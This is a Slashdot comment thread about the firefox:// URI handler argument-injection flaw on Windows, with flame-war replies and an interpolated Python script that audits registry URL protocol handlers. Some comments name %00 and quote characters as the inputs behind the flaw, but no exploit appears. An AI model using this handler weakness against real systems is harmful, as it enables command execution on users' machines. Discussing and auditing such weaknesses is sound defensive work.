      Can I have this in English, please? I think you're trying to say that the 'firefox://' URI is a native Windows function, but it's not. Firefox registers it on install.

      Those would probably be the ones downgraded by IE7 that created the problem in the first place.

      How can you downgrade a URI? It's a handler. It passes whatever is in it straight to Firefox without being edited, which is why this problem is happening in the first place.

      This explains why there was no problem before IE7 and the nebulous assertion that other "browsers and applications" have the same problem.

      Can you prove they don't? Run some tests for me. The people in the article have and they disagree with you.

      Chances are that this is going to balloon out to anything web enabled on Windoze.

      Like what? Give me an example.
      --
      "It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
    4. Re:Problem is not Firefox. by dedazo · · Score: 2, Informative

      This has nothing to do with IE7. The URI handler functionality is something that has existed since Windows 98. Where do you think KDE got the bright idea for kioslaves? As long as you are responsible enough to check your inputs (which apparently IE6 and 7 and Opera do) then there shouldn't be any problem.

      You can stop trying to imply that this is some sort of sabotage by Microsoft, considering they'd be sabotaging themselves in the process. No different to your dumb claim that they "sabotaged" ACPI.

      --
      Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
    5. Re:Problem is not Firefox. by Anonymous Coward · · Score: 1, Informative

      Wait, let me get the steps straight here:

      1. Internet Explorer is given a URI with the protocol 'firefox://'
      2. IE doesn't recognize protocol as one it handles internally
      3. IE checks the registry for a protocol handler matching 'firefox://'
      4. IE finds Firefox.exe
      5. By specification, it is the protocol handler's responsibility to check its own inputs, so IE launches Firefox.exe, with the unchecked URI on the command line, expects Firefox.exe to do its job, and considers the hand-off complete
      6. Firefox starts and, due to a flaw in its input check, craps the bed

      And somehow this is Microsoft's fault? Because Internet Explorer doesn't make uninformed assumptions about the format of the URIs for somebody else's protocols? Oh, and if Firefox isn't installed, step 4 fails, and IE simply displays a message to inform the user that the firefox:// protocol is unknown. The exploitable code is never run, because the exploitable code isn't installed. But that's still Microsoft's fault, simply because they exist, right?
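To see what step 3 actually consults, here is an added Python inventory of the registry's URL protocol registrations (not code from the thread or from Microsoft). It relies on two facts about Windows: a scheme is registered as a URL protocol when HKEY_CLASSES_ROOT\<scheme> carries a "URL Protocol" value, and the default value of HKEY_CLASSES_ROOT\<scheme>\shell\open\command is the command line that gets run with %1 replaced by the whole URI, which is the unchecked hand-off of step 5. The scheme names and paths in SAMPLE_HANDLERS are constructed; the live registry walk runs only on Windows, and the analysis functions are exercised on the sample everywhere else.

```python
"""Inventory of the URL protocol handlers a Windows browser can reach through
the registry lookup described in the comment above.

Added example, not code from the thread or from Microsoft.  Registry layout
assumed (documented Windows behaviour): HKCR\<scheme> with a "URL Protocol"
value marks a scheme, and HKCR\<scheme>\shell\open\command holds the command
template in which %1 is replaced by the full URI.
"""
import re
import sys

# Constructed sample of command templates keyed by scheme (paths are made up).
SAMPLE_HANDLERS = {
    "mailto": '"C:\\Program Files\\ExampleMail\\mail.exe" -compose "%1"',
    "examplebrowser": '"C:\\Program Files\\ExampleBrowser\\browser.exe" -url "%1"',
    "legacytool": 'C:\\Tools\\legacy.exe %1',
}

# A token is either a double-quoted run (quotes stripped) or a bare run of non-space.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_command(template: str) -> list:
    """Split a shell\\open\\command template into tokens, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(template)]


def executable_of(template: str) -> str:
    """The program that will be handed the URI: the first token of the template."""
    tokens = split_command(template)
    return tokens[0] if tokens else ""


def uri_passed_as_single_argument(template: str) -> bool:
    """True when %1 is quoted, so the URI reaches the program as one argv entry."""
    return '"%1"' in template


def audit(handlers: dict) -> list:
    """One finding per registered scheme: which program runs and how the URI is passed."""
    findings = []
    for scheme, template in sorted(handlers.items()):
        findings.append({
            "scheme": scheme,
            "executable": executable_of(template),
            "receives_uri": "%1" in template,
            "single_argument": uri_passed_as_single_argument(template),
        })
    return findings


def enumerate_url_protocols() -> dict:
    """Walk HKEY_CLASSES_ROOT for schemes marked 'URL Protocol'; returns {} off Windows."""
    if sys.platform != "win32":
        return {}
    import winreg  # Windows-only standard-library module

    handlers = {}
    index = 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
        except OSError:
            break  # no more subkeys
        index += 1
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as key:
                winreg.QueryValueEx(key, "URL Protocol")  # raises when the marker is absent
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name + r"\shell\open\command") as cmd:
                handlers[name.lower()] = winreg.QueryValue(cmd, None)  # default value
        except OSError:
            continue  # not a URL protocol, or no open command registered
    return handlers


if __name__ == "__main__":
    live = enumerate_url_protocols()
    for finding in audit(live or SAMPLE_HANDLERS):
        print(finding)
```

Run on a workstation, the output is the list of programs that a web page can reach through this hand-off; the ones worth a second look are those never written for untrusted input, which is the category argent describes elsewhere in the thread. A false single_argument means the template leaves %1 unquoted, so a URI containing spaces arrives at the program split across several arguments rather than as the single string the author of step 5 assumes.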

  41. Microsoft's (and Apple's) responsibility. by argent · · Score: 1

    This is part of what is required when registering a browser on that OS. It's pretty important if you want to set Firefox as the default browser.

    I.e., this is a "shell" URI that should not be visible to non-trusted content *at all*.

    There need to be separate registries for this.

    OS X has the same problem, though at least there it doesn't include any equivalent to ActiveX, and the KHTML-based API makes it easier to implement a fix.

    http://www.scarydevil.com/~peter/io/apple.html

    1. Re:Microsoft's (and Apple's) responsibility. by a.d.trick · · Score: 1

      How else is firefox supposed to handle protocols like mailto on a Windows system? The problem is that the URIs shouldn't have been trusted in the first place. The fact that they can execute arbitrary commands is appalling!

      The fact that browsers have a protocol attached to them is bad taste, but it's also a red herring. The real problem is that URIs can execute arbitrary commands. Firefox has as much to do with this as a potato has to do with an airliner.

    2. Re:Microsoft's (and Apple's) responsibility. by argent · · Score: 1

      How else is firefox supposed to handle protocols like mailto on a Windows system?

      Using the URI bindings provided for *untrusted* objects. Just like it would use the MIME type bindings for untrusted objects.

      The problem is that the URIs shouldn't have been trusted in the first place.

      Certainly not the ones that browsers use.

      The problem is not limited to URIs. There are also plugins, file-type mappings, MIME-type mappings, and so on. Most of these, no matter what type of binding they are, have nothing to do with browsers. The mistake that Microsoft and Apple made was saying "these types of mappings are used by browsers, and these types aren't". Microsoft draws the line at plugins... browsers can execute any ActiveX plugin in the system, and quite a few more, unless they explicitly exclude them. Apple draws the line at file type mappings for downloaded files... browsers will by default open "safe" files, regardless of what the bindings for them are.

      You're just drawing another line along the same axis. The problem is, that's the wrong axis.

      Files, binding types (URI vs plugin vs MIME type), URI types, and so on, are not "safe" or "unsafe".

      It's the *handlers* that are safe (they either implement a sandbox or do not have mechanisms to do dangerous things) or unsafe (they have the ability to do dangerous things). The syntax (URI, path, COM API, what have you) is an implementation detail... if the application is designed securely and uses the API for that binding type securely... it doesn't matter which way the binding was implemented. If the application isn't designed securely or is sloppy about the binding, you're owned no matter how it gets invoked. There will always be applications you can safely open from the shell to view or operate on files that you must never expose to a browser.

      And MOST applications fall into that category.

      MOST applications are not sandboxed or secure. Not only is that hard to do for non-trivial apps, but MANY of them can not be, because it's their job to do dangerous things. It's up to the application to register as a shell application (to be used by applications for references that the user or application is in control of), or a browser application (to be used for untrusted objects). When the OS has no way to distinguish between the two, you lose.

  42. Quit whining by ComSon0 · · Score: 1

    Here is Billy & Nate's blog
    You can look around for the additional information they have.
    -h

  43. It already exists: The OffByOne browser by Anonymous Coward · · Score: 0

    The Off By One Browser does exactly what you ask. Best of all, it caches everything into RAM, so there's no disk fragmentation from cache files, and all traces of browsing are cleared when you close it.

    1. Re:It already exists: The OffByOne browser by Anonymous Coward · · Score: 0

      Best of all, it caches everything into RAM, so there's no disk fragmentation from cache files, and all traces of browsing are cleared when you close it.

      Unfortunately The Off By One Browser isn't open source, and is Windows only.

      I suspect that the claim of all traces of browsing being cleared isn't quite accurate either. While it may not directly cache anything to the disk, isn't it possible/likely that browser data will get left behind in the VM swap file? A recovery utility that scavenges a drive (not looking for any help from directory entries) could likely read things from an unencrypted VM swap file. Even when the host OS provides swap encryption, that only makes it more complicated to read. Particularly with a closed-source OS, it is foolish to assume that someone else doesn't have a method or backdoor that can decode from the swap.

  44. Glitch in slashdot by infonography · · Score: 1

    I was replying to another story, I didn't read this one prior to my post. Very weird.

    --
    Sorry about the writing. Robot fingers, you know? Cliff Steele in DOOM PATROL #23
  45. That's where the new German law is quite handy. by Anonymous Coward · · Score: 0

    The German government decided that it is unlawful to do any research on security issues. Even university researchers will be prosecuted. Ms. Merkel, the head of our government holds a doctorate in physics. That is what makes German universities valued that much. German Computer Science is a matter of trust and believing in politicians, who truly are the better scientists.

  46. %00 backdoor in Windows OS by Torodung · · Score: 1

    In other words, it's a backdoor in the URI handler for Windows, and Microsoft is "educating" everybody to scrub inputs before passing things off to the backdoored handler.

    Great. MS became the "gatekeeper" to all networking security bugs in their OS when they integrated IE into the operating system back in 1997. This is easily fixed by not allowing the URI handler in the OS to behave strangely when given specific inputs (such as %00 and " ).

    In short, Microsoft should remove the backdoor. 'Nuff said.

    --
    Toro

  47. Easy solution? by porneL · · Score: 1

    Opera protects against it by asking each time a new unapproved URI scheme is used. It's not perfect, because it requires the user to think, and approved apps may be exploitable as well, but at least it narrows the attack surface and gives some warning.

    It might be further improved to distinguish between clicked links and automatically triggered opens (like pop-up blocker does).

  48. That's why Sabotage Sucks. by twitter · · Score: 1

    You can stop trying to imply that this is some sort of sabotage by Microsoft, considering they'd be sabotaging themselves in the process. No different to your dumb claim that they "sabotaged" ACPI.

    It's nice of you to concede the destructive effects of this kind of competition. I would never argue that it's anything but self defeating for M$ but that does not keep them from doing it again and again.

    A company that's been convicted of anti-competitive practices in several lawsuits has earned reasonable suspicion when things break. It was Bill Gates' dumb idea to sabotage ACPI, and that came out in the Iowa Consumer Case. The DRDOS case, (also see p36 here), is a good early example of the overall behavior. They sabotaged a competitor then filled BBSs with astroturf that blamed the victim. Just for you, dedazo, I've made a nice list of more recent sabotages here. The victims include iPod, Firefox, Google Desktop and anti-virus makers and the FUD hate machine is cranked up to full blast in all of those cases.

    The big suck of software sabotage is that it always degrades the user experience. The obvious result is that the user loses their choice of software and is forced to use something second rate. Less obvious results are performance hits in what's left. Sabotage demands extra branching and checks that take time and introduce errors of their own. The legacy of this kind of "competition" is complex file formats, insane APIs, and a system that's feature poor, expensive, unreliable and lacks real choices. Even when M$ wins this game without shooting themselves in the foot, they lose.

    --

    Friends don't help friends install M$ junk.

    1. Re:That's why Sabotage Sucks. by Macthorpe · · Score: 1

      Yet another twitter hate-fest with no facts, no proof, and no relevance whatsoever to the topic. I see you stopped replying to me when I made you look like a moron, which wasn't particularly difficult under the circumstances.

      Seeing as I had a nice trio of negative mods all in a line I can see that calling you on your bullshit gives zealots a wakeup call - can't have all those people who know things educating people, can we? What's funny is, people expect that modding me down will shut me up. Fat chance. I earned my karma by being right. You earned yours by toeing the populist line. I think that puts me clear in front of you from a moral perspective.

      You keep posting this crap, and there'll always be someone like me to tell the truth, don't you worry about that.

      --
      "It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
    2. Re:That's why Sabotage Sucks. by dedazo · · Score: 1

      It's nice of you to concede

      Oops, you started out wrong here, zealot. Let's back up a bit. Don't put letters in my posts, and stop peppering yours with links to useless FUD that has been disproved time and time again. A little less of that petulant hillbilly prose would be nice, too.

      Try again, and this time put some effort into it.

      --
      Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo